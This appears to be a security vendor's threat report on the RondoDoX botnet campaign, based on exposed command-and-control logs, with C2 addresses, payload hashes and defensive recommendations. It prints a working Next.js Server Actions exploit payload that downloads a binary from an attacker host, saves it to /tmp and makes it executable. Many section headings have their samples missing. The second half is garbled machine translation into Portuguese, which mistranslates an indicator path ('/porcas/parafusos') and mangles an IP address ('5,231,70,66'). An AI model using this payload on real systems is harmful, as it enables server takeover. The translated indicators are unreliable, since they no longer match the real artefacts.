Executive Summary

CloudSEK discovered another wave of RondoDoX botnet exploitation through exposed command and control logs spanning nine months. This log file documents a multi-month campaign of automated exploitation attempts targeting vulnerable web applications and IoT devices. The activity spans from March 2025 to December 2025, showing quick adaptation to latest trends in attacks by the threat actor group, not limiting themselves to deploying botnet payloads, web shells, and cryptominers - but also weaponizing the latest Next.js vulnerability. On 10th December, Darktrace reported about React2Shell exploitation from their honeypot telemetry, but the threat actors have switched up their infrastructure ever since. 3 days after their report, we started seeing new C2s that are active till date.

CloudSEK has been monitoring these logs for several months, with customers already alerted when their technology stacks overlapped with targeted attack vectors from this campaign.

‍

Analysis 

During our routine scans for malicious infrastructure, CloudSEK’s TRIAD found loggers in use by threat actors.

The server contained botnet command and control logs issued by threat actors over the period of the last 9months, which gave us insights about their attack vectors and infrastructure in use.

Key Findings

• Three distinct phases confirmed through log timestamps and attack patterns
• Six confirmed C2 servers with overlapping operational periods
• Rondo botnet is the primary malware family with 10+ variants
• Next.js RCE became dominant attack vector in December 2025
• 40+ repeat attacks on same vulnerability within 6 days (Dec 13-Present)

Temporal Attack Patterns (Evidence-Based)

Highest Activity Periods:

• April 3, 2025: 80+ exploitation attempts (vulnerability scanning day)
• August 2025: Daily automated attacks on IoT devices
• December 13, 2025 - Present: Peak Next.js exploitation (hourly attacks)

Attack Frequency:

• Phase 1 (March-April): Sporadic, manual testing
• Phase 2 (April-June): Daily automated scans
• Phase 3 (July-December): Hourly automated deployment

Phase 1: Initial Reconnaissance & Vulnerability Testing (March-April 2025)

March 28, 2025 - First Exploitation Attempt

April 3, 2025 - Systematic Vulnerability Scanning Begins

SQL Injection testing:

Command Injection testing:

Java Deserialization testing:

WebLogic exploitation:

Timestamp: 2025-04-03 11:49:01

‍

Phase 2: Web Application Exploitation (April-June 2025)

April 3, 2025 - Mass Vulnerability Probing

CMS/Framework Attacks:

Drupal exploitation:

Struts2 OGNL injection:

WordPress Gravity Forms Unique ID Plugin:

IoT Device Targeting:

Wavlink router:

Router diagnostic command injection:

‍

Phase 3: IoT Botnet Deployment Campaign (July-December 2025)

July 2025 - Rondo Botnet Infrastructure Emergence

July 18-20, 2025 - Linksys Router Campaign

C2: 38.59.219[.]27 serving malware named "rondo.[device-type].sh"

‍

August 2025 - Campaign Intensification

New C2: 74.194.191[.]52

NTP server poisoning:

Ping diagnostic abuse:

Hostname injection:

Evidence: At least 13 different rondo script variants deployed from this C2.

‍

November 2025 - New C2 Infrastructure

C2: 41.231.37.153 and 70.184.13.47

NTP Abuse:

Command execution via diagnostic tools:

System command submit:

‍

December 2025 to Present - Next.js Exploitation Wave

Binary download and execution:

Timestamp: 2025-12-13 08:48:07

[0] => {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/tmp/123').on('finish',()=>process.mainModule.require('fs').chmodSync('/tmp/123',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}

‍

‍

Next.js Server Actions Exploitation

Wave 1: Next.js Vulnerability Scanning

• Timeframe: December 8-16, 2025
• Purpose: Identify vulnerable servers
• Method: Blind RCE testing with output exfiltration via redirects
• Commands: echo VULN, whoami, arithmetic tests

Wave 2: IoT Botnet Deployment via Node.js

• Timeframe: December 13, 2025 - Present
• Purpose: Deploy botnet clients on vulnerable servers
• Method: Download ELF binaries, chmod +x, background execution
• C2: 5.255.121.141, 51.81.104.115
• Payloads: 
  
  • /nuts/poop - Coinminer
  • /nuts/bolts - this payload is a Linux-focused botnet support framework designed to establish dominance, persistence, and long-term stability on compromised hosts. The first variant operates as a loader and health-checker for RondoBOT, terminating competing malware and coin miners before downloading the primary bot binary and configuration directly from its C2 infrastructure. The second variant complements this by aggressively purging known botnets, Docker-based payloads, residual artifacts from prior campaigns, and associated cron jobs, while also enforcing persistence through /etc/crontab. It continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors.
  • /nuts/x86 - Mirai

Impact

• Widespread IoT Device Compromise: Organizations with internet-facing routers (DLink, TP-Link, Netgear, Linksys, ASUS), IP cameras, and network appliances face automated hourly exploitation attempts, leading to potential botnet enrollment, DDoS participation, and cryptomining operations on corporate infrastructure.
• Next.js Application Risk: Enterprises running Next.js Server Actions (especially versions vulnerable to prototype pollution attacks) face critical RCE exposure with active exploitation observed recently. The vulnerability allows complete server compromise through deserialization flaws in Server Actions.
• Credential Harvesting and Lateral Movement: The multi-attack chain begins with web application exploitation (WordPress, Drupal, Struts2, WebLogic) to establish initial access, followed by credential theft and pivoting to targeting IoT infrastructure, potentially compromising entire network segments.
• Ameaças persistentes de várias arquiteturas: O botnet implanta binários para arquiteturas x86, x86_64, MIPS, ARM e PowerPC com vários mecanismos de fallback (wget, curl, tftp, ftp), garantindo a entrega de carga útil em diversos ambientes corporativos, incluindo instâncias de nuvem, dispositivos periféricos e sistemas embarcados.

‍

Recomendações

• Auditoria imediata do aplicativo Next.js: conduz análises de segurança emergenciais de todos os aplicativos Next.js usando o Server Actions. Implemente a validação de entrada em todos os dados serializados, atualize imediatamente para versões corrigidas e considere desativar as ações do servidor em aplicativos voltados para a Internet até que os patches do fornecedor sejam validados e implantados.
• Segmentação e fortalecimento de dispositivos de IoT: Isole todos os dispositivos de IoT (roteadores, câmeras, NAS, impressoras) em VLANs dedicadas com filtragem de saída rigorosa. Desative as interfaces de gerenciamento remoto, altere as credenciais padrão imediatamente, aplique atualizações de firmware e implemente regras de firewall baseadas em listas de permissões que bloqueiam conexões de saída, exceto para servidores de atualização confiáveis.
• Controles de segurança de aplicativos da Web: implementa firewalls de aplicativos da Web (WAF) com regras que bloqueiam padrões de injeção de comandos (wget, curl, busybox, operadores de pipe em parâmetros HTTP), implementa validação estrita de entrada em todas as interfaces de diagnóstico/administrativo e desativa recursos desnecessários de execução de comandos em painéis da web.
• Detecção e bloqueio em nível de rede: bloqueia a infraestrutura C2 identificada (38.59.219.27, 74.194.191.52, 41.231.37.153, 70.184.13.47, 5.255.121.141, 51.81.104.115) em firewalls de perímetro e resolvedores de DNS. Implante assinaturas de detecção de intrusão de rede para padrões de URI “rondo.*.sh” e solicitações de endpoint “nuts/poop”.
• Monitoramento comportamental para indicadores de persistência: monitora a execução suspeita de processos nos diretórios /tmp, /dev/shm e /dev; detecta operações chmod definindo as permissões 755/777; alerta sobre a geração de processos em segundo plano via & operator; e rastreia conexões HTTP/HTTPS de saída de processos que não são do navegador para IPs desconhecidos.
• Arquitetura Zero Trust para interfaces administrativas: exija VPN ou salte o acesso ao host para todas as interfaces de gerenciamento de dispositivos, implemente a autenticação multifator nos painéis de administração, use a autenticação baseada em certificados sempre que possível e registre todas as ações administrativas no SIEM com alertas em tempo real sobre tentativas de execução de comandos.
• Gerenciamento contínuo de vulnerabilidades: estabeleça SLAs de gerenciamento de patches exigindo que vulnerabilidades críticas em aplicativos voltados para a Internet sejam corrigidas em 72 horas. Assine os feeds de inteligência de ameaças para receber alertas antecipados sobre tentativas de exploração, realizar testes de penetração trimestrais com foco na IoT e nas superfícies de ataque de aplicativos da Web e manter o inventário de ativos de todos os dispositivos com versões de firmware rastreadas.

‍

Apêndice

IOCs

Servidores C2 confirmados com cronograma:

‍

Cargas binárias (sha256):

• /nuts/poop - 895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b (Coinminer)
• /porcas/parafusos - 8e0bc23a87d349e5a5356252ce17576093b7858fdf6ea84919fbdcb2e117168e (verificação de integridade)

50be5257678412f0810d46e0b0bc573eb65c6ce4617346c1527ff0dc9b7fc79e (persistência)

• /nuts/x86 - 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (Mirai)

Girando

O agente da ameaça adicionou uma imagem NSFW em um de seus C2s como um impedimento para qualquer pessoa que visite o site.

Usando o valor de hash dessa imagem, encontramos mais alguns C2s que estavam sendo usados por esses agentes de ameaças.

C2 encontrado usando pivô

5,231,70,66

Referências

• *Fonte de inteligência e confiabilidade da informação - Wikipedia
• ^#Protocolo de semáforo - Wikipedia